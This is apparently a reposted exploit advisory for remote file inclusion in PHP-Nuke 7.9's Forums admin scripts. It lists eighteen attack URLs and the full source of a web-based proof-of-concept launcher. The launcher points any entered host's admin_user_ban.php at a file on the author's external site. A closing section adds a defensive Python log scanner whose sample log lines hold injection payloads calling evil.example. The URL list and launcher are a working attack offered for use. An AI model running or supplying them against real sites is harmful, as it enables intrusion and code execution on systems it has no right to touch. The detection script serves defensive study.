
http://www.site.com/modules/Forums/admin/index.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_board.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_disallow.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_forumauth.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_groups.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_ranks.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_styles.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_user_ban.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_words.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_avatar.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_forums.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_mass_email.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_smilies.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_users.php?phpbb_root_path=[evil_scripts]
Source:
http://securitydot.net/xpl/exploits/vulnerabilities/articles/1015/exploit.html
Online proof of concept:
http://whk.sitehacking.net/wp-content/themes/PoCs/PHP-Nuke-RFI/
Index.html:
Code
<style type="text/css">
<!--
body {
background-image: url(fondo.gif);
}
-->
</style><center>
<h2><u>Proof of concept for remote file inclusion in PHP-Nuke 7.9 or later</u></h2>
<p align="left"> </p>
</center>
<form method="GET" action="index.php">
<p><b>Vulnerable host:</b>
<input type="text" name="url">
<input type="submit" value="Test">
E.g.: http://host.com/nuke </p>
</form>
<p>If the test worked for you, or you ran into any problem, please leave your comments at <a href="http://whk.sitehacking.net/?p=81">http://whk.sitehacking.net/?p=81</a></p>
<p>NOTE: this proof of concept is intended solely for testing on your own servers.</p>
<p> </p>
<p><a href="http://whk.sitehacking.net/">WHK.SiteHacking.Net</a></p>
index.php
Code
<style type="text/css">
<!--
body {
background-image: url(fondo.gif);
}
-->
</style>
<?php
// Base URL of the target entered in the index.html form (e.g. http://host.com/nuke).
$URL_SF = isset($_GET["url"]) ? $_GET["url"] : '';
// Escape quotes so the value can be embedded in the action attribute below.
$URL = htmlspecialchars($URL_SF, ENT_QUOTES);
if ($URL == '') {
    // No host supplied: send the visitor back to the form.
    echo '<META HTTP-EQUIV="refresh" content="0;URL=http://whk.sitehacking.net/wp-content/themes/PoCs/PHP-Nuke-RFI/">';
}
else {
    // Build a form whose action points at the vulnerable admin script of the
    // given host and passes the PoC file in the phpbb_root_path parameter.
    echo '<form method="get" action="' . $URL . '/Forums/admin/admin_user_ban.php?phpbb_root_path=http://whk.sitehacking.net/wp-content/themes/PoCs/PHP-Nuke-RFI/bat.png?vrb=x">';
    echo '<input type="submit" value="Test">';
    echo '</form>';
}
?>
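From the defender's side, the requests listed at the top of this post all share one signature: a `phpbb_root_path` query parameter whose value starts with a URL scheme or PHP stream wrapper instead of a local directory. The following script is an added example (not part of the original post or the securitydot.net advisory) that scans web-server access logs in combined log format for that pattern. The log lines, IP addresses (documentation ranges) and the host `evil.example` are all constructed for the demonstration; it decodes the parameter a second time so that double-percent-encoded payloads are caught as well.

```python
"""Flag remote-file-inclusion attempts against the PHP-Nuke Forums admin
scripts by looking for a phpbb_root_path parameter that names a remote
resource (URL scheme or PHP stream wrapper) in access-log request lines.
Added example; log lines and hosts below are constructed, not real traffic."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines in Apache combined log format (hypothetical traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2006:13:55:36 +0000] "GET /modules/Forums/admin/admin_user_ban.php?phpbb_root_path=http://evil.example/shell.txt? HTTP/1.1" 200 512 "-" "Mozilla/4.0"
198.51.100.7 - - [10/Oct/2006:13:56:01 +0000] "GET /modules/Forums/admin/admin_users.php?phpbb_root_path=./../ HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Oct/2006:13:57:12 +0000] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=%2568%2574%2574%2570%3A//evil.example/s.txt%3F HTTP/1.1" 500 0 "-" "curl/7.15"
203.0.113.8 - - [10/Oct/2006:13:58:40 +0000] "GET /modules/Forums/viewtopic.php?t=42 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
192.0.2.4 - - [10/Oct/2006:13:59:03 +0000] "GET /modules/Forums/admin/index.php?phpbb_root_path=ftp://evil.example/ HTTP/1.1" 200 300 "-" "Wget"
"""

# Request line of a combined-format entry: client IP, timestamp, method, target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A value that begins with "<scheme>:" (http:, ftp:, php:, data:, ...) is an
# include of something other than a local directory.
SCHEME_RE = re.compile(r'^[A-Za-z][A-Za-z0-9+.\-]*:')
# Parameters that the affected scripts feed into include()/require().
WATCHED_PARAMS = ("phpbb_root_path",)


def is_remote_include(value: str) -> bool:
    """True when the (already once-decoded) parameter value names a remote
    resource or stream wrapper. Decoded a second time to catch double encoding."""
    candidate = unquote(value).lstrip()
    return SCHEME_RE.match(candidate) is not None


def find_rfi_attempts(log_text: str) -> list:
    """Return one record per request whose watched parameter points off-host."""
    hits = []
    for line in log_text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue  # not a combined-format request line; skip silently
        parts = urlsplit(match.group("target"))
        params = parse_qs(parts.query, keep_blank_values=True)
        for name in WATCHED_PARAMS:
            for value in params.get(name, []):
                if is_remote_include(value):
                    hits.append({
                        "ip": match.group("ip"),
                        "time": match.group("ts"),
                        "script": parts.path,
                        "param": name,
                        "value": value,
                        # A 200 means the script ran; worth checking what it fetched.
                        "status": int(match.group("status")),
                    })
    return hits


if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print(f'{hit["ip"]} -> {hit["script"]} {hit["param"]}={hit["value"]} (HTTP {hit["status"]})')
```

The `./../` request is deliberately not flagged: that is the value the admin scripts normally use, and a local path is a different (traversal) concern from the remote inclusion discussed here. To extend the check to other parameters that reach an `include`, add them to `WATCHED_PARAMS`.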